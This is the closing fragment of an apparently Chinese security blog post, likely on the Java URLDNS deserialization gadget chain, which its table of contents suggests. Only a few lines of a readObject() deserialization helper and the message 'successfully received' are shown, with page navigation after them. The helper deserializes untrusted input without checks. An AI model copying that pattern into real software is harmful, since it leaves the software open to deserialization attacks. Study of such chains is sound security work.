<span class="line"><span style="color:#ADBAC7">        Object</span><span style="color:#ADBAC7"> obj</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> ois.</span><span style="color:#DCBDFB">readObject</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> obj;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>成功收到</p>  </div> <aside class="hidden md:block"> <nav class="sticky top-24 text-sm"><p class="mb-3 font-mono text-xs uppercase tracking-wider text-muted-light dark:text-muted-dark">
on this page
</p><ul class="space-y-2 border-l border-border-light dark:border-border-dark"><li><a href="#urlhashcode" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">URL.hashCode()</a></li><li><a href="#hashmaphash" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">HashMap.hash()</a></li><li><a href="#hashmapputval" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">HashMap.putVal()</a></li><li><a href="#hashmapreadobject" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">HashMap.readObject()</a></li></ul></nav> </aside> </div> <footer class="mt-16 border-t border-border-light dark:border-border-dark pt-8 text-sm text-muted-light dark:text-muted-dark"> <a href="/blog" class="hover:text-fg-light dark:hover:text-fg-dark">← back to blog</a> </footer> </article>  </main> <footer class="border-t border-border-light dark:border-border-dark"> <div class="mx-auto flex w-full max-w-6xl flex-col items-start justify-between gap-3 px-6 py-8 text-sm text-muted-light dark:text-muted-dark md:flex-row md:items-center"> <p>
© 2026 oSthing. built with Astro.
</p> <p class="font-mono text-xs"> <a href="/rss.xml" class="hover:text-fg-light dark:hover:text-fg-dark">rss</a> <span class="mx-2 opacity-50">·</span> <a href="/sitemap.xml" class="hover:text-fg-light dark:hover:text-fg-dark">sitemap</a> </p> </div> </footer> </body></html>